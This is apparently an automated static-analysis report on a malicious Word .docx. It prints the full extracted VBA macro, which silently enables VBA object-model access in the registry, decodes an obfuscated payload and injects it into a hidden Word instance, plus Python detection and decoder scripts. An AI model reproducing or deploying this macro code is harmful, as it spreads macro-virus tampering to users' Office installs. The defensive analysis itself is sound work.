Malicious Office (OOXML) / .DOCX — malware analysis report

Static analysis result for SHA-256 e6cc542b690066cf…

MALICIOUS

Office (OOXML) / .DOCX

Size: 33.2 KB
Created: 2022-02-06 12:21:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2026-06-18
MD5: 83b6030d3fa8f8efee3400440af230c6
SHA-1: 403d9437edbc1a3f32aaa5a63eea633dea57ea0a
SHA-256: e6cc542b690066cf6914e88199ce234236f2d929f313af8b0b2f8babe43d4f7d
Risk score: 292

Heuristics (9)

  • VBA project inside OOXML [medium] OOXML_VBA (6 related findings)
    Document contains a VBA project (word/vbaProject.bin); VBA macros present.
  • WScript.Shell usage [critical] OLE_VBA_WSCRIPT
    The only WScript.Shell call is a RegWrite that sets HKCU\SOFTWARE\Microsoft\Office\16.0\Word\Security\AccessVBOM to 1, i.e. it silently switches on "Trust access to the VBA project object model" for the current user. That setting is what the later VBProject / CodeModule calls need: without it Word refuses programmatic access to macro projects. No process is launched through WScript.Shell here; the registry write is a prerequisite for the self-replication finding below. Environments that pin AccessVBOM through the Policies hive (HKCU\SOFTWARE\Policies\Microsoft\Office\16.0\Word\Security) are not affected by this per-user write, because the policy value takes precedence.
    Matched line in script
        CreateObject("Wscript.Shell").RegWrite "HKCU\SOFTWARE\Microsoft\Office\16.0\Word\Security\AccessVBOM", 1, "REG_DWORD"
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink, which keeps the real CreateObject/Shell/URL indicators out of the macro source. In this sample the decoder is Putin(): it substitutes the letters a-j with the digits 0-9 and then converts each run of three characters with Chr(), turning a letters-only blob back into text. The encoded input is read from UserForm1.TextBox1.Text, so the payload is not in the listed module code at all; it is stored with the form's control data inside word/vbaProject.bin. The decoded text goes to CodeModule.AddFromString (see the next finding), not to a shell. The line below is the sink the rule matched on.
    Matched line in script
        CreateObject("Wscript.Shell").RegWrite "HKCU\SOFTWARE\Microsoft\Office\16.0\Word\Security\AccessVBOM", 1, "REG_DWORD"
  • VBA macro-virus self-replication / AV tampering [critical] OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule / VBComponents InsertLines, DeleteLines, AddFromString or OrganizerCopy) to copy itself into the global template or other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). Self-replicating code of this kind has no benign document use and is the defining behaviour of the W97M document macro-virus family, independent of any AV signature.
    What this sample does: Create_Word starts a second, hidden Word instance (Visible = 0, DisplayAlerts = 0), adds a blank document, injects the decoded payload into that document's first VBA component (ThisDocument) with AddFromString, then closes the document without saving and quits the instance. The payload text is not on this page, so what the injected code does cannot be stated from static analysis alone; note that a close-time handler (AutoClose / Document_Close) defined in it would fire at doc.Close, which is the only moment the injected module exists. unlink() then re-attaches the active document to the user's Normal.dotm (C:\Users\<user>\AppData\Roaming\Microsoft\Templates\Normal.dotm), marks the templates as saved to suppress prompts, saves, and closes. On any error it falls through to DeleteVBAPROJECT, which removes every module from the current document and saves: a cleanup path that leaves analysts a macro-free copy. SubstitutePage, run before Create_Word, deletes the whole document body and inserts the AutoText entry named "Doc" from the attached template, swapping the lure page for content once macros are enabled.
    Matched line in script
        doc.VBProject.VBComponents(1).CodeModule.AddFromString (Putin(content))
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    Two CreateObject calls are present: WScript.Shell (the registry write below) and Word.Application, the latter written as Interaction.CreateObject, which is the same function qualified with its module name and is used to spawn the hidden second Word instance.
    Matched line in script
        CreateObject("Wscript.Shell").RegWrite "HKCU\SOFTWARE\Microsoft\Office\16.0\Word\Security\AccessVBOM", 1, "REG_DWORD"
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. Here source extraction succeeded as well, so this finding corroborates the source-level ones rather than standing in for them.
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Document_Open macro. It forces Print Layout view (needed for the background and page swap in SubstitutePage), removes document protection with the hard-coded password "20exlnt20", and calls Launch. The alreadyLaunched guard is ineffective: the variable is never declared, so each procedure gets its own local Variant, the assignment in Document_Open is invisible to Launch, and the chain runs on every open.
    Matched line in script
        Sub Document_Open()
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached it. Every URL below is an OOXML, DrawingML or Office extension XML namespace URI that Word writes into document.xml and its companion parts. They are schema identifiers, not links the document resolves, and none is a network indicator for this sample. All were found in document text (OOXML body / shared strings):
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.microsoft.com/office/drawing/2014/chartex
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.microsoft.com/office/drawing/2016/ink
    • http://schemas.microsoft.com/office/drawing/2017/model3d
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2018/wordml/cex
    • http://schemas.microsoft.com/office/word/2016/wordml/cid
    • http://schemas.microsoft.com/office/word/2018/wordml
    • http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash
    • http://schemas.microsoft.com/office/word/2015/wordml/symex
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape
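The source-level heuristics above can be reproduced with a small static triage script. The following is an added example, not the analyzer's own code: the regexes are one reading of the rule descriptions on this page, the rule IDs and severities are copied from the report, and both VBA inputs are constructed (SAMPLE is a trimmed excerpt of the macro listing in the Extracted artifacts section, BENIGN is a control with an auto-exec entry point and nothing else). Point it at a .bas file extracted with olevba to run it on a real sample.

```python
"""Static VBA triage modelled on the heuristic IDs used in this report.
Added example, not the analyzer's own code: the patterns below are one
reading of the rule descriptions on this page, the severities are copied
from the report, and the two VBA samples are constructed (SAMPLE is a
trimmed excerpt of the listing in the Extracted artifacts section)."""
import re
import sys

SEVERITY_RANK = {"info": 0, "low": 1, "medium": 2, "high": 3, "critical": 4}

AUTOEXEC = re.compile(
    r"^\s*(?:Private\s+|Public\s+)?Sub\s+"
    r"(?:Document_Open|AutoOpen|Auto_Open|AutoExec|Workbook_Open)\b", re.I)
CREATEOBJ = re.compile(r"\bCreateObject\s*\(", re.I)
WSCRIPT = re.compile(r'CreateObject\s*\(\s*"WScript\.Shell"', re.I)
# VBE object-model rewriting, or switching off macro-virus protection.
REPLICATION = re.compile(
    r"\bVBProject\b.*\b(?:AddFromString|InsertLines|DeleteLines|OrganizerCopy)\b"
    r"|\bOptions\.VirusProtection\s*=\s*False", re.I)
# Decoder shapes named by the loader rule: Chr(Mid(...)) char-array loops,
# or a pile of Replace() calls stripping junk tokens / remapping digits.
DECODER = re.compile(r"\bChr\s*\(\s*Mid\s*\(", re.I)
REPLACE_CALL = re.compile(r"\bReplace\s*\(", re.I)
SINK = re.compile(r"\b(?:CreateObject|Shell|ShellExecute|AddFromString)\b", re.I)

# Simple rules: one regex each; the first matching line is reported.
RULES = {
    "OLE_VBA_DOCOPEN": ("low", AUTOEXEC),
    "OLE_VBA_CREATEOBJ": ("high", CREATEOBJ),
    "OLE_VBA_WSCRIPT": ("critical", WSCRIPT),
    "OLE_VBA_MACRO_VIRUS_REPLICATION": ("critical", REPLICATION),
}


def triage(vba_source: str) -> dict:
    """Return {rule_id: {"severity": ..., "line": n, "match": text}}."""
    lines = vba_source.splitlines()
    findings = {}
    for rule_id, (severity, pattern) in RULES.items():
        for n, line in enumerate(lines, 1):
            if pattern.search(line):
                findings[rule_id] = {"severity": severity, "line": n, "match": line.strip()}
                break
    # Composite rule: auto-exec entry point + string decoder + COM/execution sink.
    has_decoder = (any(DECODER.search(l) for l in lines)
                   or sum(len(REPLACE_CALL.findall(l)) for l in lines) >= 5)
    sink_line = next(((n, l) for n, l in enumerate(lines, 1) if SINK.search(l)), None)
    if "OLE_VBA_DOCOPEN" in findings and has_decoder and sink_line:
        findings["OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER"] = {
            "severity": "critical", "line": sink_line[0], "match": sink_line[1].strip()}
    return findings


def verdict(findings: dict) -> str:
    """Highest severity present, or "clean" when nothing matched."""
    if not findings:
        return "clean"
    return max((f["severity"] for f in findings.values()), key=SEVERITY_RANK.__getitem__)


# Constructed: trimmed excerpt of the macro listing in this report.
SAMPLE = r'''Sub Document_Open()
    Launch
End Sub
Sub Create_Word()
    CreateObject("Wscript.Shell").RegWrite "HKCU\SOFTWARE\Microsoft\Office\16.0\Word\Security\AccessVBOM", 1, "REG_DWORD"
    Set Wordy = Interaction.CreateObject("Word.Application")
    Set doc = Wordy.Documents.Add("")
    doc.VBProject.VBComponents(1).CodeModule.AddFromString (Putin(content))
End Sub
Private Function Putin(i As String) As String
    i = Replace(i, "a", "0")
    i = Replace(i, "b", "1")
    i = Replace(i, "c", "2")
    i = Replace(i, "d", "3")
    i = Replace(i, "e", "4")
    For Counter = 1 To Len(i) Step 3
        o = o & Chr(Mid(i, Counter, 3))
    Next
End Function
'''

# Constructed benign control: an auto-exec macro with no sink or decoder.
BENIGN = '''Sub Document_Open()
    MsgBox "Welcome"
End Sub
'''

if __name__ == "__main__":
    src = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE
    result = triage(src)
    for rule_id, f in result.items():
        print(f"{f['severity']:8} {rule_id}  line {f['line']}: {f['match']}")
    print("verdict:", verdict(result))
```

The composite loader rule deliberately requires all three parts (entry point, decoder shape, sink); dropping any one of them turns it into a generic CreateObject or Replace() detector and floods benign documents with critical hits.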

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 3931 bytes
SHA-256: b59653f7efd6114374a51ef5a493b1fe85fa6af39c530598e519a53dcd2471ff
Preview of the extracted script (the viewer caps the preview at the first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Document_Open()
    If ActiveDocument.ActiveWindow.View.Type <> wdPrintView Then
        ActiveDocument.ActiveWindow.View.Type = wdPrintView
    End If
    If ActiveDocument.ProtectionType <> wdNoProtection Then ActiveDocument.Unprotect _
       Password:="20exlnt20"
    alreadyLaunched = True
    Launch
End Sub
Private Sub Launch()
    If alreadyLaunched = True Then
        Exit Sub
    End If
    SubstitutePage
    Create_Word
    alreadyLaunched = True
End Sub
Sub Create_Word()
    CreateObject("Wscript.Shell").RegWrite "HKCU\SOFTWARE\Microsoft\Office\16.0\Word\Security\AccessVBOM", 1, "REG_DWORD"
    Dim content As String
    content = UserForm1.TextBox1.Text
    DoEvents
    Set Wordy = Interaction.CreateObject("Word.Application")
    Wordy.DisplayAlerts = 0
    Wordy.Visible = 0
    Set doc = Wordy.Documents.Add("")
    doc.Saved = True
    doc.VBProject.VBComponents(1).CodeModule.AddFromString (Putin(content))
    doc.Close
    Wordy.Quit
    unlink
End Sub
Private Function Putin(i As String) As String
    Dim o As String
    i = Replace(i, "a", "0")
    i = Replace(i, "b", "1")
    i = Replace(i, "c", "2")
    i = Replace(i, "d", "3")
    i = Replace(i, "e", "4")
    i = Replace(i, "f", "5")
    i = Replace(i, "g", "6")
    i = Replace(i, "h", "7")
    i = Replace(i, "i", "8")
    i = Replace(i, "j", "9")
    For Counter = 1 To Len(i) Step 3
        o = o & Chr(Mid(i, Counter, 3))
    Next
    Putin = o
End Function
Private Sub SubstitutePage()
    Dim doc As Word.Document
    Dim firstPageRange As Range
    Dim rng As Range
    Dim autoTextTemplateName As String
    ActiveDocument.ActiveWindow.View.DisplayBackgrounds = True
    ActiveDocument.Background.Fill.ForeColor.RGB = RGB(255, 255, 255)
    ActiveDocument.Background.Fill.Solid
    autoTextTemplateName = "Doc"
    Set firstPageRange = Word.ActiveDocument.Range
    firstPageRange.Select
    Selection.WholeStory
    Selection.Delete Unit:=wdCharacter, Count:=1
    Set doc = ActiveDocument
    Set rng = doc.Sections(1).Range
    doc.AttachedTemplate.AutoTextEntries(autoTextTemplateName).Insert rng, True
    doc.Save
End Sub
Sub unlink()
    Application.DisplayAlerts = False
    On Error GoTo Destroy
    ThisDocument.AttachedTemplate.Saved = True
    CurrUser = Application.UserName
    tmpLoc = "C:\Users\" & CurrUser & "\AppData\Roaming\Microsoft\Templates\Normal.dotm"
    ActiveDocument.AttachedTemplate = tmpLoc
    ActiveDocument.AttachedTemplate.Saved = True
    ActiveDocument.Save
    ThisDocument.Close savechanges:=False
Exit Sub
Destroy:
    Call ThisDocument.DeleteVBAPROJECT
    ActiveDocument.Save
    ActiveDocument.AttachedTemplate.Saved = True
    ThisDocument.Close savechanges:=False
End Sub
Sub DeleteVBAPROJECT()
    Application.DisplayAlerts = False
    Dim i As Long
    On Error Resume Next
    With ThisDocument.VBProject
        For i = .VBComponents.Count To 1 Step -1
            .VBComponents.Remove .VBComponents(i)
            .VBComponents(i).CodeModule.DeleteLines _
            1, .VBComponents(i).CodeModule.CountOfLines
        Next i
    End With
    On Error GoTo 0
    ActiveDocument.Save
End Sub


Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{6B970FF8-CE7B-4350-8712-F0F5C75F6347}{305DCA27-0997-49DC-8534-BB044F26581B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox1_Change()

End Sub
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 34816 bytes
SHA-256: 0696725ec2aacef47ab3746d3a785fad0d2dc48b71bcbf37aa8f0ed93f5bfc85
Detection (vbaProject_00.bin)
ClamAV: No threats found
Obfuscation or payload: likely. The carved artifact contains 1 long base64-like blob. A letters-only string in the a-j alphabet of the kind Putin() consumes would trip the same long-alphanumeric-run check, but the report does not identify the blob, so treat that link as unconfirmed. The missing ClamAV hit carries no weight here: the replication and loader findings rest on behaviour visible in the source, not on a signature.
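To recover whatever the macro hands to AddFromString, the Putin() transform has to be reversed over the UserForm1.TextBox1 value carved from vbaProject.bin (olevba's form-string extraction is one way to get it). The decoder below is an added example and not part of the analyzer or of the sample; the real blob is not on this page, so the test input is constructed with the inverse encode(). It also covers the two edge cases a practitioner hits with this scheme: a trailing chunk shorter than three characters (Mid() simply returns the tail) and chunk values above 255, which VBA's Chr() rejects, so a blob that produces them was not encoded this way.

```python
"""Decoder for the string obfuscation used by Putin() in the extracted macro:
lowercase a-j are substituted with digits 0-9, then each 3-character group is
read as a decimal character code. Added example; the payload blob held in
UserForm1.TextBox1 is not on this page, so inputs here are constructed."""

LETTER_TO_DIGIT = {chr(ord("a") + n): str(n) for n in range(10)}   # a..j -> 0..9
DIGIT_TO_LETTER = {v: k for k, v in LETTER_TO_DIGIT.items()}


def decode(blob: str) -> str:
    """Reverse Putin(): Replace(a..j -> 0..9), then Chr() over 3-char groups."""
    # Step 1 mirrors the ten Replace() calls. VBA Replace() uses binary
    # comparison by default, so only lowercase a-j are rewritten; everything
    # else (including literal digits) passes through unchanged.
    digits = "".join(LETTER_TO_DIGIT.get(c, c) for c in blob)
    out = []
    # Step 2 mirrors: For Counter = 1 To Len(i) Step 3: o = o & Chr(Mid(i, Counter, 3))
    for pos in range(0, len(digits), 3):
        chunk = digits[pos:pos + 3]      # Mid() returns a short tail chunk at the end
        if not chunk.isdigit():
            raise ValueError(f"non-numeric chunk {chunk!r} at offset {pos}: not this scheme")
        code = int(chunk)
        if code > 255:
            # VBA Chr() raises "Invalid procedure call" above 255, so the
            # original macro could never have decoded such a blob.
            raise ValueError(f"chunk {chunk!r} at offset {pos} exceeds Chr() range")
        out.append(chr(code))
    return "".join(out)


def encode(text: str) -> str:
    """Inverse transform, used here only to build test input: every character
    becomes a zero-padded 3-digit code spelled with the letters a-j."""
    if any(ord(c) > 255 for c in text):
        raise ValueError("only Latin-1 characters survive Chr()")
    return "".join(DIGIT_TO_LETTER[d] for c in text for d in f"{ord(c):03d}")


def looks_like_putin_blob(blob: str, min_len: int = 30) -> bool:
    """Cheap triage test for a string literal or form-control value: long,
    drawn only from a-j (or literal digits), and a multiple of 3 in length."""
    return (len(blob) >= min_len and len(blob) % 3 == 0
            and all(c in "abcdefghij0123456789" for c in blob))


if __name__ == "__main__":
    # Constructed stand-in for the TextBox1 contents; not the sample's payload.
    stand_in = encode('Sub AutoClose()\n    MsgBox "constructed"\nEnd Sub')
    print("blob:", stand_in)
    print("candidate:", looks_like_putin_blob(stand_in))
    print("decoded:\n" + decode(stand_in))
```

looks_like_putin_blob() is the check to run over every string literal and form-control value in the project before decoding: a blob that fails it was not produced by this encoder, and decode() will raise rather than emit garbage.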